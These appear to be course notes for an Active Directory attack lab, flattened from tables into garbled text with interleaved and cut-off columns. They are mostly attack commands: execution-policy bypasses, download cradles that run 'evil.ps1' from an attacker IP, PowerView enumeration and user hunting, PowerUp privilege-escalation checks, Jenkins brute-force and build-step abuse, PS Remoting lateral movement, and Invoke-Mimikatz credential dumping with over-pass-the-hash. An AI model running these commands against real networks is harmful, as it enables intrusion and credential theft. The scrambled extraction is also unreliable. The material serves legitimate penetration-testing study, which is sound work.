1 Introduction to Active Directory & Kerberos

2 Introduction to PowerShell
3 Domain Enumeration (Attacks & Defenses)
4 Trust & Privileges Mapping
5 Local Privilege Escalation
6 Credential Replay Attacks (Over-PTH, Token Replay, etc.)
7 Domain Privilege Escalation (Attacks & Defenses)
8 Dumping System & Domain Secrets
9 Kerberos Attacks & Defense (Golden, Silver Tickets & more)
10 Abusing Cross Forest Trusts (Attacks & Defense)
11 Delegation Issues
12 Persistence Techniques
13 Abusing SQL Server Trusts in an AD environment
14 Detecting attack techniques
15 Defending an AD environment
16 Bypassing Defenses
Tool
- Active Directory is a directory service used to manage Windows networks.
- It stores information about objects on the network and makes it easily available to users and admins.
- Active Directory enables centralized and secure management of an entire network, which might span a building, a city ormu

Powershell Basics
- Powershell comes built-in with Windows
- There is another version of Powershell called "Powershell Core" which works on .NET Core.
Powershell Help System
Tool
Powershell

Powershell
Powershell
Powershell
Powershell
Powershell
Powershell cmdlets
- cmdlets are used to perform an action and a .NET object is returned as the output.
- cmdlets accept parameters for different operations.
- For example : Get-Help cmdlet uses parameters like -Full, -Examples, etc.
- They have aliases and cmdlets are not executables, you can write your own cmdlet with a few lines of script.

Tool
Powershell
Powershell
Powershell Scripts
- Use cmdlets, native commands, functions, .NET, DLLs, Windows API and much more in a single 'program'
Powershell Scripts : ISE
- It is a GUI editor/Scripting environment
- Tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features
Powershell Scripts : Execution Policy
- It is NOT a security measure, it is present to prevent user from accidentally executing scripts.
Execution Policy bypass
Tool
command prompt
command prompt
command prompt
PowerShell Modules
Tool
powershell
powershell
PowerShell Script Execution (in-memory)
Tool
PowerShell
PowerShell

powershell (v3 onwards)

powershell (v3 onwards)

powershell (v3 onwards)

How to interact with AD using PS?

1. [ADSI]
2. .NET Classes
Eg : System.DirectoryServices.ActiveDirectory
3. Native Executable
4. PowerShell Scripts (.NET classes & WMI)
 Command
used to manage Windows networks.
the network and makes it easily available to users and admins.
nd secure management of an entire network, which might span a building, a city ormultiple locations throughout the world.

ws
l called "Powershell Core" which works on .NET Core.

Command
Get-Help <topic>

Examples for topics :

- Get-Item

Get-Help *
Get-Help process
Update-Help
Get-Help Get-Item -Full
Get-Help Get-Item -Examples

n and a .NET object is returned as the output.

nt operations.
ses parameters like -Full, -Examples, etc.
executables, you can write your own cmdlet with a few lines of script.

Command
Get-Command -CommandType cmdlet
Get-Process

ons, .NET, DLLs, Windows API and much more in a single 'program'

nt
p, syntax highlighting, selective execution, in-line help are some of the useful features.

ent to prevent user from accidentally executing scripts.

Command
powershell -ExecutionPolicy bypass
powershell -c <command>
powershell -encodedcommand $env:PSExecutionPolicyPreference = "bypass"

Command
Import-Module <module_path>
Get-Command -Module <module_name>

Command
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;
$ie.navigate('http://192.168.230.1/evil.ps1');sleep
5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
 Description Privileges

ltiple locations throughout the world.

Description
Load PowerView
Then,
Get-Help Get-NetUser

Lists everything about the help topics

Lists everything that contains the word "process"
Updates the Help system (v3+)
List full help about a topic (Get-Item cmdlet in this case)
Lists examples of how to run a cmdlet (Get-Item cmdlet in this case)

Description
list all cmdlets in a powershell session
lists the processes running on a system

Description
bypass ps execution policy
bypass ps execution policy
bypass ps execution policy

Description
imports a module
lists all commands in a module

Description
Comments
Tool Command
Native Executable / $ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
.NET Classes $ADClass::GetCurrentDomain()

PowerShell / Cmd prompt whoami /priv

PowerView https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

AD Module https://github.com/samratashok/ADModule

Dom
PowerView Get-NetDomain
AD Module Get-ADDomain

PowerView Get-NetDomain -Domain moneycorp.local

AD Module Get-ADDomain -Identity moneycorp.local

PowerView Get-DomainSID
AD Module (Get-ADDomain).DomainSID

PowerView Get-DomainPolicy

PowerView (Get-DomainPolicy)."system access"

(Get-DomainPolicy)."Kerberos Policy"
PowerView (Get-DomainPolicy -domain moneycorp.local)."system access"

PowerView Get-NetDomainController
AD Module Get-ADDomainController

PowerView Get-NetDomainController -Domain moneycorp.local

AD Module Get-ADDomainController -DomainName moneycorp.local -Discover

Dom
PowerView Get-NetUser
Get-NetUser -Username student1
AD Module Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *

PowerView Get-UserProperty
Get-UserProperty -Properties pwdlastset
AD Module Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -
MemberType *Property | select Name

Get-ADUser -Filter * -Properties * | select

name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}

- Properties like badpwdcount and pwdlastset help in identifying decoy objects / honeypots.

PowerView Find-UserField -SearchField Description -SearchTerm "built"

AD Module Get-ADUser -Filter 'Description -like "*built*"' -Properties Description |

select name,description

Domai
PowerView 1. Get-NetComputer
2. Get-NetComputer -OperatingSystem "*Server2016*"
3. Get-NetComputer -Ping
4. Get-NetComputer -FullData

AD Module 1. Get-ADComputer -Filter * | select Name

2. Get-ADComputer -Filter 'OperatingSystem -like "*Server2016*"' -
Properties OperatingSystem | select Name, OperatingSystem
3. Get-ADComputer -Filter * -Properties DNSHostName | %{Test-
Connection -Count 1 -ComputerName $_.DNSHostName}
4. Get-ADComputer -Filter * -Properties *

Dom
PowerView 1. Get-NetGroup
2. Get-NetGroup -Domain <target_domain>
3. Get-NetGroup -FullData

AD Module 1. Get-ADGroup -Filter * | select Name

2. Get-ADGroup -Filter * -Properties *

PowerView Get-NetGroup -GroupName *admin*

AD Module Get-ADGroup -Filter 'Name -like "*admin*"' | select Name

PowerView Get-NetGroupMember -GroupName "Domain Admins" -Recurse

AD Module Get-ADGroupMember -Identity "Domain Admins" -Recursive

PowerView Get-NetGroup -Username "student1"

AD Module Get-ADPrincipalGroupMembership -Identity student1

PowerView Get-NetLocalGroup -ComputerName dcorp-

dc.dollarcorp.moneycorp.local -ListGroups

PowerView Get-NetLocalGroup -ComputerName dcorp-

dc.dollarcorp.moneycorp.local -Recurse

PowerView Get-NetLoggedon -ComputerName <servername>

PowerView Get-LoggedonLocal -ComputerName dcorp-

dc.dollarcorp.moneycorp.local

PowerView Get-LastLoggedOn -ComputerName <servername>

PowerView Invoke-ShareFinder -Verbose

(or)
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
PowerView Invoke-Filefinder -Verbose
PowerView Get-NetFileServer

- Group Policy provides the ability to manage the configuration and changes easily and centrally in an
AD
- Allows configuration of Security settings, Registry-based policy settings, group policy preferences like
startup, shutdown, log-on, logoff scripts settings and software installations
- GPO can be abused for various attacks like privesc, backdoors, persistence,etc.

Group
PowerView 1. Get-NetGPO
2. Get-NetGPO | select displayname
3. Get-NetGPO -ComputerName dcorp-
student1.dollarcorp.moneycorp.local

powershell gpresult /R

PowerView Get-NetGPOGroup

PowerView Find-GPOComputerAdmin -Computername dcorp-

student1.dollarcorp.moneycorp.local
PowerView Find-GPOLocation -UserName student1 -Verbose

PowerView Get-NetOU -FullData

Group Policy Module Get-ADOrganizationalUnit -Filter * -Properties *

PowerView Get-NetGPO -GPOname "{AB306569-220D-43FF-B03B-83E8F4EF8081}"

Group Policy Module Get-GPO -Guid AB306569-220D-43FF-B03B-83E8F4EF8081

Access Co
Access Control Model
1. Enables control on the ability of a process to access objects and the other resources in Active Directory
based on :
- Access Tokens (security context of a process - identity & privs of a user)
- Security Descriptors (SID of the owner, Discretionary ACL (DACL) & System ACL (SACL))

Access Control List

1. List of Access Control Entries (ACE)
- ACE corresponds to individual permission or audit access. (Who has permission and what can be done
on an object?)
2. Two types of ACLs :
- DACL = Defines the permissions trustees (a user or group) have on an object.
- SACL = logs success and failure audit messages when an object is accessed
3. ACLs are vital to security architecture of an AD
Access Control List
1. List of Access Control Entries (ACE)
- ACE corresponds to individual permission or audit access. (Who has permission and what can be done
on an object?)
2. Two types of ACLs :
- DACL = Defines the permissions trustees (a user or group) have on an object.
- SACL = logs success and failure audit messages when an object is accessed
3. ACLs are vital to security architecture of an AD

DACL
PowerView Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs

This ACE record means that BUILTIN\Administrators group have 'CreateChild', 'Self', 'WriteProperty',
'ExtendedRight', 'Delete', 'GenericRead', 'WriteDacl' and 'WriteOwner' rights on the student1 object of
the type 'Allow'

PowerView Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose

AD Module (Get-Acl 'AD:\
CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Ac
cess

PowerView Get-ObjectAcl -ADSpath "LDAP://CN=Domain

Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -
ResolveGUIDs -Verbose
PowerView Invoke-ACLScanner -ResolveGUIDs

PowerView Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"

Domain
Trusts
1. In an AD environment, trust is a relationship between two domains or forests which allow users of one
domain or forest to access resources in the other domain or forest.
2. Trusts can be automatic (parent-child, same forest etc.) or established (forest, external)
3. Trusted domain objects (TDOs) represent the trust relationships in a domain

Trust Directions
1. One-way trust : Unidirectional --> Users in the trusted domain can access resources in the trusting
domain, but the reverse is not true.
2. Bi-directional trust
Trust Properties
1. Transitive trusts
2. Non-transitive trusts

Types of Trusts
1. Default / Automatic Trusts (Eg : Intra-forest trusts)
2. Shortcut Trusts (Used to reduce access time in complex scenarios)
3. External Trusts (b/w two domains in different forests when forests do not have a trust relationship)
4. Forest trusts (b/w root domains of a forest)

PowerView Get-NetDomainTrust
Get-NetDomainTrust -Domain us.dollarcorp.moneycorp.local
AD Module Get-ADTrust
Get-ADTrust -Identity us.dollarcorp.moneycorp.local

PowerView Get-NetForest
Get-NetForest -Forest eurocorp.local
AD Module Get-ADForest
Get-ADForest -Identity eurocorp.local

PowerView Get-NetForestDomain
Get-NetForestDomain -Forest eurocorp.local
AD Module (Get-ADForest).Domains
PowerView Get-NetForestCatalog
Get-NetForestCatalog -Forest eurocorp.local
AD Module Get-ADForest | select -ExpandProperty GlobalCatalogs

PowerView Get-NetForestTrust
Get-NetForestTrust -Forest eurocorp.local
AD Module Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

Use
PowerView Find-LocalAdminAccess -Verbose
PowerView Invoke-EnumerateLocalAdmin -Verbose

PowerView Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
PowerView Invoke-UserHunter -CheckAccess

PowerView Invoke-UserHunter -Stealth

Domain Enu
1 Most of the enumeration mixes really well with the normal traffic to the
DC.
2 Hardening can be done on the DC (or other machines) to contain the
information provided by the queried machine

Defense aga
NetCease NetCease is a script that changes permissions on the NetSessionEnum
method by removing permission for authenticated users group.

SAMRi10 Hardens Windows 10 and Server 2016 against enumeration which uses
the SAMR protocol (like net.exe)

net.exe = net utility (net user /domain)

Description Privileges
Get Domain info using .NET classes Domain User

check the current session's privileges Domain User

TOOLS
Domain User

Domain User

Domain Enum
Gets the current domain Domain User
Domain User

Get object of another domain Domain User

Domain User

Get Domain SID for the current domain Domain User

Domain User

Get domain policy for the current domain Domain user

Domain user

Get domain policy for another domain

Get DCs for the current domain Domain User

Get DCs for the current domain

Domain User

Get DCs for another domain Domain user

Domain user

Domain Users
Domain user

Get a list of users in the current domain

Domain user

Domain user

Domain user
Get list of all properties for users in the current domain

Domain User

Search for a particular string in a user's attributes

Domain User

Domain Computers
Domain User

Get a list of computers in the current domain Domain User

Domain Groups
 Domain User

Get all the domain groups in the current domain

Domain User

Get all the domain groups containing the word "admin" Domain User
in group name Domain User

Domain User
Get all the members of the Domain Admins Group
Domain User

Domain User
Get the group membership for a user
Domain User

List all the local groups on a machine Needs

Administrator
(Here, we are listing all the local groups on the Domain privs on a
Controller machine (dcorp-dc) non-DC
machine
Get members of all the local groups on a machine Needs
Administrator
privs on a
non-DC
machine

Get actively logged users on a computer Needs local

admin rights
on the target
Get locally logged users on a computer Needs remote
registry on the
target (started
by-default on
server OS)

Get the last logged user on a computer Needs

administrative
rights and
remote
registry on the
target

Shares
Find shares on hosts in current domain Domain User
Find sensitive files on computers in the domain Domain User
Get all fileservers of the domain Domain User

Group Policy (GPOs)

Get list of GPO in the current domain Domain user

Get the resultant set of group policy Domain user

i.e , group policy applied on the current user session.
Get GPO(s) which use Restricted Groups or groups.xml Domain user
for interesting users
Get users which are in a local group of a machine using Domain user
GPO
Get machines where the given user is member of a Domain user
specific group

(Here, specific group means users being part of groups

using a group policy)

Domain user
Get Ous in a domain
Domain user

Domain user
Get GPO applied on an OU.
Read GPOname from GPLink attribute from Get-NetOU
Domain user

Access Control Lists (ACLs)

Get the ACLs associated with the specified object Domain user

Domain user

Get the ACLs associated with the specified prefix to be

used for search
Get the ACLs associated with the specified prefix to be Domain user
used for search

Get the ACLs associated with the specified LDAP path to Domain user
be used for search

Search for interesting ACEs Domain user

Get the ACLs associated with the specified path Domain user

Domain / Forest Trusts

Domain user

Get a list of all domain trusts for the current domain

Domain user

Domain user

Get details about the current forest

Domain user

Domain user
Get all domains in the current forest
Domain user
Get all global catalogs for the current forest Domain user
(returns all machines that have a copy of the global
catalog) Domain user

Domain user
Map trusts of a forest
Domain user

User Hunting
Find all machines on the current domain where the Domain user
current user has local admin access
Find local admins on all machines of the domain Needs admin
privs on non-
DC machines

Find computers where a specified user/group (domain Domain user

admins or RDPusers or etc.) has sessions

(by-default Domain admins group)

 To find where our current user has local admin privs on Domain user
servers that have domain admin sessions
Find computers (high value targets) where a domain Domain user
admin is logged-in

Domain Enumeration Defenses

Defense against User Hunting

This fails many of the attacker's session enumeration
and hence user hunting capabilities

.\NetCease.ps1
Restart-Service -Name Server -Force

https://kurtsh.com/2016/12/19/download-samri10-tool-for-hardening-sam-remote-access-in-windows-10server-2016/
Information Obtained / Comments
- Forest
- DCs
- Parent Domain
- Current Domain
- Child domains of current domain

Ways to load powerview :

1) . .\PowerView.ps1
2) iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/
Recon/PowerView.ps1 -UseBasicParsing)

AD Module helps to perform domain enumeration even in situations where your

powershell session is running in a constrained language mode

Ways to load ADModule :

1)
a.) Import-Module .\Microsoft.ActiveDirectory.Management.dll
b.) Import-Module .\ActiveDirectory\ActiveDirectory.psd1

Provided the current domain has trust with the queried domain

1. Kerberos Policy (MaxTicketAge, MaxServiceAge, etc.)

2. System Access (MinimumPasswordAge, MaxPasswordAge, Password
Complexity,etc.)
3. Registry values

Provided the current domain has trust with the queried domain

1. IP address
2. name
3. OS
1. IP address
2. name
3. OS
4. LDAP / LDAPS port no.

Note the options : -Filter , -Properties, -Identity

Note the options : -Filter , -Properties, -Identity

The list of objects returned are not all necessary computers/machines.

Administrators simply have the ability to create a computer object in the domain, so all
this does is fetches all the objects of the type computer.

Get-NetComputer -Ping & Get-ADComputer -Filter * -Properties DNSHostName | %

{Test-Connection -Count 1 -ComputerName $_.DNSHostName} are used to find out
which machines are alive in the domain. Both of these scripts use ICMP packets to test
connection, so if there is host-based or external firewall that disables ICMP packets or
ping is filtered out, then there is a chance that the script may return false positives.
Groups like "Enterprise Admins", "schema admins" and "Enterprise Key Admins" are
not visible in the result because these groups are only present in the root node of the
forest.
Eg : Get-NetGroup -GroupName *admin* -Domain moneycorp.local

(here, moneycorp.local is the forest root)

Without -ListGroups, we would be enumerating the Group membership of

Administrators Group on Domain Controller.

Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC will avoid

finding the default shares like IPC, etc.
searches for files containing passwords, keys, etc.
searches for high value targets (high value targets are machines/servers where lot of
users authenticate to)

Restricted groups are those groups that are pushed through the group policy and are
part of the local groups on your machine
Say we create a user and make it part of "RDP users" group in all the machines using
group policy, then we can enumerate such users using Find-GPOComputerAdmin

Both of these commands are only valid if there are groups that use group policies to
push/create/delete/modify objects in a domain.
SACL
Interesting ACEs mean the ones where we have write or modify permissions instead of
the default read rights
This function queries the DC of the current or provided domain for a list of computers
(Get-NetComputer) and then use multi-threaded Invoke-CheckLocalAdminAccess on
each of those machines. Since this function is extremely noisy and can cause a network
spike, it is better to run it in chunks of machines (using the option -ComputerFile)
rather than all machines at once. The function leaves a 4624 (logon event) or 4634
(logoff event) for each machine on the domain.

This same function can also be done with the help of remote administration tools like
WMI and powershell remoting. It is pretty useful in cases where ports of RPC and SMB
(which are used by Find-LocalAdminAccess) are blocked. In such cases, you can use an
alternate tool --> Find-WMILocalAdminAccess.ps1 (this is because, WMI by-default
requires local admin access)
This function queries the DC of the current or provided domain for a list of computers
(Get-NetComputer) and then use multi-threaded Get-NetLocalGroup on each machine.

This function queries the DC of the current or provided domain for members of the
given group (Domain admins by default) using Get-NetGroupMember, gets a list of
computers (Get-NetComputer) and list sessions and logged on users (Get-NetSession /
Get-NetLoggedon) from each machine
This function queries the DC of the current or provided domain for members of the
given group (Domain admins by default) using Get-NetGroupMember, gets a list of only
high value targets (high traffic servers) - DC, File servers & distributed file servers, for
being stealthy and generating lesser traffic and lists sessions and logged on users (Get-
NetSession / Get-NetLoggedon) from each machine

To revert back to pre-netcease state :

.\NetCease.ps1 -Revert
Restart-Service -Name Server -Force
Tool Command
In an AD environment, there are multiple scenarios which lead to privilege escalation.
We had a look at the following :
- Hunting for Local Admin access on other machines
- Hunting for high privilege domain accounts (like a Domain Admin) - check for sessions from DAs

There are various ways of locally escalating privileges on Windows box :

- Missing patches
- Automated deployment & Autologon passwords in clear text
- AlwaysInstallElevated (Any user can run MSI as SYSTEM)
- Misconfigured services (like unquoted service path etc.)
- DLL hijacking & more

We can use the below tools for complete coverage :

- PowerUp --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- BeRoot --> https://github.com/AlessandroZ/BeRoot
- Privesc --> https://github.com/enjoiz/Privesc

Service issues
PowerUp Get-ServiceUnquoted -Verbose
(. .\PowerUp.ps1)

PowerUp Get-ModifiableServiceFile -Verbose

PowerUp Get-ModifiableService -Verbose

PowerShell Get-WmiObject -Class win32_service

Get-WmiObject -Class win32_service | select pathname

Run all PrivEsc c

PowerUp Invoke-AllChecks
BeRoot .\beRoot.exe
BeRoot is an executable
Privesc Invoke-PrivEsc

Unquoted Servi
1 If we want to abuse/exploit the Unquoted Service Path Vuln, then the
privileges with which the service runs should be of some higher
privilege than what we have currently. (This can be seen in the
"StartName" attribute as seen in the image below)
2 If we want to abuse/exploit the Unquoted Service Path Vuln, then we
must have the capability to restart the service (which can be found out
from "CanRestart" attribute in the above image)

Jenkins Fe
- What we have been doing up to now (and will keep doing further ahead as well) is relying on
features abuse.
- Features abuse are awesome as there are seldom patches for them and aren't the focus of
security teams.
- One of the best features abuse is targeting enterprise applications which are not built keeping
security in mind.
- On windows, many enterprise applications need either Administrative privileges or SYSTEM
privileges making them a great avenue for privilege escalation.

- On versions prior to Jenkins 2.x, anonymous read privileges are present.

- The anonymous read privs allow us to see the list of the users on the jenkins instance and
information about the build executor server.
- Jenkins does not have any protection against brute-force attacks. So, we can always try brute-
force attacks without any fear of lockouts, etc. (This is only true in the case where jenkins uses it's
own user database.) We can usually find out if it uses it's own database by looking at the
usernames.
- Jenkins also provides integration with AD or GSuite , etc. for authentication. Under such cases,
beware of running a brute-force attack.

- While trying to brute-force jenkins, it is always a good bet to try reverse of username as the
password.
What can you do if you have a normal user account on jenkins?
- See for all projects if we have the 'configure' option.
This is because :
- If you don't have admin access but could add/edit build steps in the build configuration, then
we can add a build step, add "Execute Windows Batch command" and enter powershell -c <cmd>
- This way it is possible to download and execute scripts, run encoded scripts and more.
In cases where there are already multiple builds for a project, if you have the permission to, then
shuffle your build to be the top most one as jenkins does not run the builds post the build that
fails.
This is because :
- If you don't have admin access but could add/edit build steps in the build configuration, then
we can add a build step, add "Execute Windows Batch command" and enter powershell -c <cmd>
- This way it is possible to download and execute scripts, run encoded scripts and more.
In cases where there are already multiple builds for a project, if you have the permission to, then
shuffle your build to be the top most one as jenkins does not run the builds post the build that
fails.
 Description Privileges
1. C:\Windows\Panther\unattend.xml --> usually contains
passwords of atleast local admins in clear text.
2. C:\Windows\System32\Sysprep\Sysprep.xml --> usually
contains creds in clear text.
3. Autologon passwords are stored in Windows Registry in clear
text which can also be extracted

Service issues using PowerUp

Get services with unquoted paths and a space in their name

Get services where the current user can write to its binary path
or change arguments to the binary
Get the services whose configuration current user can modify
(such as make the service temporarily point to another binary,
etc.)
Get list of all the services on this machine and their info.
Get list of the bin paths of all the services on this machine

Run all PrivEsc checks using tools

Unquoted Service Path Vuln info.

 Jenkins Feature Abuse
- Enterprise applications such as CI tools are very useful for feature abuse as they
provide the ability to run OS level commands from the web console.
- One such CI tool is Jenkins.
- Jenkins is a widely used CI tool.
- There are many interesting aspects with Jenkins, but for now we would limit our
discussion to the ability of running system commands on Jenkins.
- There is a jenkins server running on dcorp-ci (172.16.3.11) on port 8080
- On windows, jenkins master or jenkins slave atleast needs local admin privs. By-
default it is SYSTEM, but atleast local admin privs are required.

What can an admin account (admin user) on jenkins do?

- Jenkins provides a script console (https://172.16.3.11:8080/script) to the
administrators. In the script console, Groovy scripts could be executed.
Example Script : (for eg :whoami)
def sout = new StringBuffer() , serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout,serr)
proc.WaitForOrKill(1000)
println "out> $sout err> $serr"
If you want to check whether the user who's jenkins instance you are logged into is a
local admin on that machine, in the build step, we can give something like
'powershell net localgroup administrators' command and see if we belong to that
set of users/groups.
Information Obtained / Comments

What is unquoted service path vulnerability?

BloodHound https://github.com/BloodHoundAD/BloodHound
- Provides GUI for AD entities and relationships for the data collected
by it's ingestors
- Uses Graph Theory to provide the capability of mapping shortest
path for interesting things like Domain Admins.
- There are built-in queries for frequently used actions.
- Also supports custom cypher queries.
- More useful for Blue Team and system admins than Red teamers
because it causes a lot of noise in the network causing a significant
spike and gets you detected easily.

Ingestors
- They ingest the data and supply the data to BloodHound
(SharpHound.ps1 is an ingestor)
- Invoke-BloodHound -CollectionMethod All -Verbose
- The generated archive can be uploaded to the BloodHound
Application
- To avoid detections like Advanced Threat Analytics (ATA) :
Invoke-BloodHound -CollectionMethod All -ExcludeDC

- Before starting BloodHound, we need to start the Neo4j service

1. C:\neo4j-community-3.5.1\bin > neo4j.bat install-service
2. C:\neo4j-community-3.5.1\bin > neo4j.bat start

Domain
Admins
Commands
Invoke-BloodHound -CollectionMethod All -Verbose
Invoke-BloodHound -CollectionMethod LoggedOn -Verbose
Ctrl key
Right click on a group node > Click 'Expand'
Description
Collect all domain data
Collect the session details of the domain users as well
Turns on/off the node labels
Shows the members of the group
Tool Command
LATERAL MOVEMENT WITH PO
What we have done till now?
- We have extensively enumerated our domain (powerview, ad module, group policy module, bloodhound)
- We have escalated our privileges locally
- We have also found other machines in the domain where we have local admin access.
- So, now we will learn lateral movement techniques so that we can learn to use our local admin rights to escalate our
privileges to a domain level.

- One of the most common and powerful techniques of lateral movement is the protocol - PowerShell Remoting.
- PowerShell Remoting is an administration capability which is baked into newer version of windows that allows admins to do
multiple tasks on multiple machines in a really fast manner.
- You will find this increasingly used in enterprises. It is enabled by default on Server 2012 onwards.
- You may need to enable remoting (Enable-PSRemoting) on a Desktop windows machine and Admin privs are required to do
that.
- You get elevated shell on a remote system if admin creds are used to authenticate (which is the default setting)

PowerShell Enter-PSSession -ComputerName dcorp-

adminsrv.dollarcorp.moneycorp.local
PowerShell $sess = New-PSSession -ComputerName dcorp-
adminsrv.dollarcorp.moneycorp.local

Enter-PSSession -Session $sess

One-To-Many :
1. a.k.a Fanout Remoting
2. Non-interactive
3. Executes commands parallely
4. Useful cmdlets:
Invoke-Command

PowerShell Invoke-Command -ComputerName dcorp-

adminsrv.dollarcorp.moneycorp.local -
ScriptBlock{whoami;hostname}

PowerShell Invoke-Command -ScriptBlock {Get-Process} -

ComputerName (Get-Content <list_of_servers.txt>)

PowerShell Invoke-Command -FilePath C:\Scripts\Get-

PassHashes.ps1 -ComputerName (Get-Content
<list_of_servers.txt>)

If we try to run a script or a cmdlet on a remote machine through PS Remoting and it does not run / produces an error
message, chances are that the powershell session that we are on (of the remote machine) is running in a constrained language
mode. When a powershell session is running in a constrained language mode, it has a list of actions that cannot be executed
(like dangerous scripts, etc.)

In our case, on dcorp-adminsrv, app locker is configured. Powershell v5 is smart enough to restrict itself in a constrained
language mode if the applocker is configured in "allow" mode on the powershell.exe
message, chances are that the powershell session that we are on (of the remote machine) is running in a constrained language
mode. When a powershell session is running in a constrained language mode, it has a list of actions that cannot be executed
(like dangerous scripts, etc.)

In our case, on dcorp-adminsrv, app locker is configured. Powershell v5 is smart enough to restrict itself in a constrained
language mode if the applocker is configured in "allow" mode on the powershell.exe

Loading local functions on a remote machine and exec

Step 1 Create some function :

function hello
{
Write-Output "Hello from function"
}

Step 2 Save it (hello.ps1)

Step 3 On your local machine, load the script
. .\hello.ps1
Step 4 Invoke-Command -ComputerName dcorp-
adminsrv.dollarcorp.moneycorp.local -ScriptBlock $
{function:hello}

PowerShell Invoke-Command -ScriptBlock ${function:Get-

PassHashes} -ComputerName (Get-Content
<list_of_servers.txt>)

PowerShell Invoke-Command -ScriptBlock ${function:Get-

PassHashes} -ComputerName (Get-Content
<list_of_servers.txt>) -ArgumentList

Loading local functions on a remote machine and executing it (usi

Step 1 $sess = New-PSSession -ComputerName dcorp-
adminsrv.dollarcorp.moneycorp.local

Step 2 Invoke-Command -FilePath C:\AD\Tools\hello.ps1 -

Session $sess
Step 3 Enter-PSSession -Session $sess
Step 4 hello

PowerShell $sess = New-PSSession -ComputerName Server1

Invoke-Command -Session $sess -ScriptBlock {$Proc =

Get-Process}

Invoke-Command -Session $sess -ScriptBlock

{$Proc.name}
 LATERAL MOVEMENT WITH
- The script(invoke-mimikatz) could be used to dump credentials, tickets and more using mimikatz with PowerShell without
dropping the mimikatz exe to disk.
- It is very useful for passing and replaying hashes, tickets and for many exciting AD attacks.
- Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz ca
be used using this script.
- The script needs admin privs for dumping creds from local machine. Many attacks need specific privs which will be covered
while discussing the attack.

Reading from LSASS.exe

Mimikatz (Invoke- Invoke-Mimikatz -DumpCreds
Mimikatz)
Mimikatz (Invoke- Invoke-Mimikatz -DumpCreds -ComputerName
Mimikatz) @("sys1", "sys2")

Writing to LSASS.exe
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "sekurlsa::pth
Mimikatz) /user:Administrator
/domain:dollarcorp.moneycorp.local
/ntlm:<ntlm_hash> /run:powershell.exe" '
 Description Privileges
LATERAL MOVEMENT WITH POWERSHELL REMOTING
- PowerShell Remoting by default uses TCP port 5985 (which is based on
d module, group policy module, bloodhound) - 5985 (HTTP Transport Protocol)
- 5986 (With SSL)
e have local admin access. Types of PS Remoting :
we can learn to use our local admin rights to escalate our - One-to-One (interactive login to the machine, creds are not left unless
credSSP or unconstrained delegation on the target machine.)
- One-to-Many

l movement is the protocol - PowerShell Remoting. One-To-One :

baked into newer version of windows that allows admins to do 1. Works over a session called PSSession (PSSession is interactive, runs in
called wsmprovhost and is a stateful session)
d by default on Server 2012 onwards. 2. Useful cmdlets:
Desktop windows machine and Admin privs are required to do a) New-PSSession
b) Enter-PSSession
e used to authenticate (which is the default setting) 3. Enter-PSSession does not have a parameter like -FilePath to specify a s
remotely as in the case of Invoke-Command (One-To-Many)

Powershell remoting into the dcorp-adminsrv

computer.
Using the statefulness of the PSSession . Local admin
This way we can powershell remote into the privs on target
machine, and also conserve the state. m/c (in this
case, dcorp-
adminsrv)
 a) Run commands & scripts on :
- mutiple remote computers
- in disconnected sessions (v3)
- as background job and more
b) The best thing in PowerShell for passing the hashes, using
credentials and executing commands on multiple remote
computers.
c) Use -Credential parameter to pass username/password

Execute script on a remote machine Local admin

privs on target
m/c (in this
case, dcorp-
adminsrv)

Execute commands or scripts on a list of machines Local admin

privs on target
m/c (in this
case, dcorp-
adminsrv)

Execute scripts from files on a list of machines Local admin

privs on target
m/c (in this
case, dcorp-
adminsrv)

gh PS Remoting and it does not run / produces an error

on (of the remote machine) is running in a constrained language
anguage mode, it has a list of actions that cannot be executed

rshell v5 is smart enough to restrict itself in a constrained

on the powershell.exe
on (of the remote machine) is running in a constrained language
anguage mode, it has a list of actions that cannot be executed

rshell v5 is smart enough to restrict itself in a constrained

on the powershell.exe

Loading local functions on a remote machine and executing it

To execute locally loaded functions on a remote Local admin

machine privs on target
m/c (in this
case, dcorp-
adminsrv)

To execute locally loaded functions on a remote Local admin

machine and pass arguments to the function privs on target
m/c (in this
case, dcorp-
adminsrv)

ding local functions on a remote machine and executing it (using Enter-PSSession)

Create a session state variable

Load the script into the session

Enter our session

running our custom function on the remote
machine

Execute "stateful" commands using Invoke-

Command
 LATERAL MOVEMENT WITH INVOKE-MIMIKATZ
als, tickets and more using mimikatz with PowerShell without

for many exciting AD attacks.

d reflectively into the memory. All the functions of mimikatz can

achine. Many attacks need specific privs which will be covered

Dump credentials on a local machine admin privs on

local machine
Dump credentials on multiple remote machines admin privs on
machines from
which lsass is
dumped

Using "Over pass the hash" to generate tokens from admin privs
hashes
 Information Obtained / Comments
ERSHELL REMOTING
owerShell Remoting by default uses TCP port 5985 (which is based on Win-RM)
985 (HTTP Transport Protocol)
